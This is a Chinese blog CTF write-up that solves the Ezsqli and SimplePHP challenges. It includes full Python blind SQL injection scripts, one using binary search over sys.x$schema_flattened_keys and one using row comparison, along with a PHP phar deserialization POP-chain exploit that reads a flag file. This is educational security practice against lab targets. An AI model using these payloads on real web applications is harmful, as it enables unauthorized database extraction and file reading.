一天一道ctf 第56天(ascii偏移盲注)

最新推荐文章于 2024-05-16 15:00:12 发布
最新推荐文章于 2024-05-16 15:00:12 发布
阅读量497 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/119776063
版权

[GYCTF2020]Ezsqli
先用二分法写一个脚本查一下表名,二分法快是快,但就是容易出错,用sleep延缓一下请求速度会好一些。or被过滤了所以informaiton.schema用不了,换成sys.x$schema_flattened_keys。

import requests
import time

url = "http://7630a861-14ab-4171-bfd2-dff39c2434b9.node4.buuoj.cn:81/"

flag = ""

payload = "1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})^1"

for i in range(1,100):
    min_value = 33
    max_value = 130
    mid = (min_value + max_value) // 2
    while (min_value < max_value):
        py = payload.format(i,mid)
        data = {"id": py}
        r = requests.post(url=url,data=data)
        if "Nu1L" in r.text:
            min_value = mid + 1
        else:
            max_value = mid
        mid = (min_value + max_value) // 2
    if (chr(mid) == " "):
        break
    flag += chr(mid)
    print(flag)
    time.sleep(0.5)

在这里插入图片描述
爆出来表名是f1ag_1s_h3r3_hhhhh,但是information.schema被过滤以后我们没法像之前一样继续爆列名。但我们知道了表名所以可以用ascii位偏移比较字符串来获取表的内容。(select 1,"{}")是因为flag在f1ag_1s_h3r3_hhhhh的第二列,可以从(select 1,1)(select 1,1,1)试出来。
同样加入sleep避免请求太快出错。

import requests
import time

url = 'http://67e56c51-dad1-4cd9-b205-91d106ccf701.node4.buuoj.cn:81/'
def add(flag):
    res = ''
    res += flag
    return res
flag = ''
for i in range(1,200):
    for char in range(32, 127):
        hexchar = add(flag + chr(char))
        payload = '1^((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))^1'.format(hexchar)
        print(payload)
        time.sleep(0.1)
        data = {'id':payload}
        r = requests.post(url=url, data=data)
        text = r.text
        if 'Nu1L' in r.text:
            flag += chr(char-1)
            print(flag)
            break

爆出来的FLAG是大写,但是buu上提交的得是小写,用lower函数转换一下就好了。
在这里插入图片描述
通过文件查看漏洞看一下index.php,直接看flag.php是不行的。再看base.php,继续看file.php和upload_file.php,陆续找到function.php,class.php
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
[SWPUCTF 2018]SimplePHP

<?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

上传phar文件,构造pop链:C1e4r->__destruct()——>Show->__toString()——>Test->__get()->get()->file_get()

<?php
class C1e4r
{
    public $test;
    public $str;
}

class Show
{
    public $source;
    public $str;
}
class Test
{
    public $file;
    public $params;

}

$a = new C1e4r();
$b = new Show();
$c = new Test();
$c->params['source'] = "/var/www/html/f1ag.php";//目标文件
$a->str = $b;   //触发__tostring
$b->str['str'] = $c;  //触发__get;


$phar = new Phar("exp.phar"); //生成phar文件
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($a); //触发头是C1e4r类
$phar->addFromString("exp.txt", "test"); //生成签名
$phar->stopBuffering();

?>

上传成功后本来应该是要md5算文件名的,但是直接看upload好像就能看到文件目录,也不知道是预期还是非预期。
在这里插入图片描述
复制文件名在file.php用phar协议访问,得到base64加密字符串,解码得到flag。
在这里插入图片描述

scrawman
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf练习---ASCII码而已
ruins44的博客
05-12 2582
题目: \u5927\u5bb6\u597d\uff0c\u6211\u662f\u0040\u65e0\u6240\u4e0d\u80fd\u7684\u9b42\u5927\u4eba\uff01\u8bdd\u8bf4\u5fae\u535a\u7c89\u4e1d\u8fc7\u767e\u771f\u7684\u597d\u96be\u3002\u3002\u0077\u0063\u0
CTFSQL盲注.py
11-25
CTF解题中有时会用到盲注,这是一段SQL盲注代码,运行于python37环境,多个字段信息提取的句子已注释保存。
mysql盲注ascii_[翻译]关于通过对8bit的ascii做右位移提高mysql盲注效率
weixin_42593130的博客
01-27 113
该楼层疑似违规已被系统折叠隐藏此楼查看此楼通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位下面将以查询mysql数据库当中user()的第一位为例:ps:第二位,第三位依次类推select substr(user(),2,1) mysql> select substr(user(),3,1)首先执行如下sql语句:mysql> select (ascii((su...
ctf常见的加解密_ctf常用解密
最新发布
2401_84970268的博客
05-16 422
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
mysql盲注ascii_关于sql盲注语法
weixin_39884832的博客
02-28 282
如果页面没有显错数字,则用盲注语法根据页面变化来判断数据内容获取数据长度:and (select top 1 len(列名) from 表名)>5and (select top 1 len(password) from admin)>16//错误and (select top 1 len(password) from admin)>15//正常获取指定位数的数据:and (sel...
[CTF]ACSII码
weixin_30414635的博客
12-11 530
[CTF]ACSII码 ----------转自百度百科 https://baike.baidu.com/item/ASCII/309296?fromtitle=ascii码&fromid=99077&fr=aladdin ASCII(American Standard Code for Information Interchange,美国...
JAVA 利用ASCII偏移(来自IDEA免费激活码游戏)
★【World Of Moshow 郑锴】★
03-15 1248
前言 最近idea风风光光激活码失效,于是官方推出了一系列游戏,DD大哥也给我们解析了很多 20/03/13 JetBrains 第二轮:再为免费全家桶续命三个月 20/03/12 免费获取 Jetbrain 全家桶使用兑换码的正确姿势! 兑换地址 https://www.jetbrains.com/promo/quest/ 解决方案 其中第一个任务,你需要到MPS-31816去获取一个线索。...
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
pin-in-CTF:使用intel pin来求解一部分CTF challenge
05-09
【标题】:“pin-in-CTF:利用Intel Pin工具解决CTF挑战” 【知识点详解】 Intel Pin是一款强大的动态二进制分析工具,主要用于程序行为分析、性能监测、代码插桩等场景。在“pin-in-CTF”项目中,开发者或安全...
CTF从入门到提升(一).docx
12-18
CTF从入门到提升(一) CTF(Capture The Flag)是一种网络安全竞赛的形式,起源于西方传统运动,两军互相争夺旗帜,夺取敌军旗帜代表战败。在信息安全领域,CTF是通过各种攻击手法,获取服务器后寻找指定的字段,...
ascll码偏移法实现文本文件加密解密
03-15
文本文档里面输入要加密的字符,程序实现加密后输出另一个文本文档
ctfAsciiCracker:对于ctf,我必须找到密码Len = 10,ascii值= 1000,第二个字母= S或83
03-03
ctfAsciiCracker:对于ctf,我必须找到密码Len = 10,ascii值= 1000,第二个字母= S或83
ascii码对照转换器,挺方便的
08-18
10进制数据与ascii码转换,非常的方便,不过也有点欠缺,就是未提供16进制转换。
JAVA 将字符串首字母转为大写 - 利用ASCII偏移
牛邪骁的博客
04-05 1740
str = str.substring(0, 1).toUpperCase() + str.substring(1); 看到一种效率更高的做法: public static String firstAlphabetToUpper(String str) { ...
对一个单词进行加密操作,在ASCII表中偏移量为3
王陈锋的博客
09-27 317
import java.util.*; public class zuoye9_27 { public static void main(String[] args) { String str; int i=0; char temp; Scanner reader=new Scanner(System.in); str=reader.nextLine(); char[] password=str.
CTF-杂项3:一段特殊的ascii密文
weixin_61842894的博客
11-16 793
题目:解密ascll码-83,121,110,116,71,115,121,110,116,136,135,120,135,108,110,126,115,112,63,61,63,62,108,67,63,69,108,76,76,76,76,138,90,113,66,71,112,110,66,62,62,67,112,112,66,111,112,67,113,63,110,114,69,66,65,110,111,111,113,68,61,63,112,69,68,68,68。
CTF ASCII码 密码解密题 简单
A Little Bean
05-02 2109
题目就是一张图片如下,并且说有几个蛋被打乱过:
ctfhub布尔盲注
08-31
布尔盲注是一种常用于渗透测试中的技术,用于检测和利用应用程序中的漏洞。在CTF比赛中,也经常会涉及到布尔盲注的题目。 布尔盲注是通过构造恶意的输入来判断应用程序是否存在漏洞。它的原理是利用应用程序对输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值